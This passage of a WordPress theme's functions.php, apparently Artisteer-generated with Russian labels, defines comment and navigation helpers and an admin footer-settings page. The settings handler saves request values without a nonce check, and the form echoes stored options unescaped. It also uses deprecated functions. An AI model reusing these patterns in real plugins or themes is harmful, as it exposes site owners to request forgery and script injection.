    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Футер", "Футер", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Футер</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
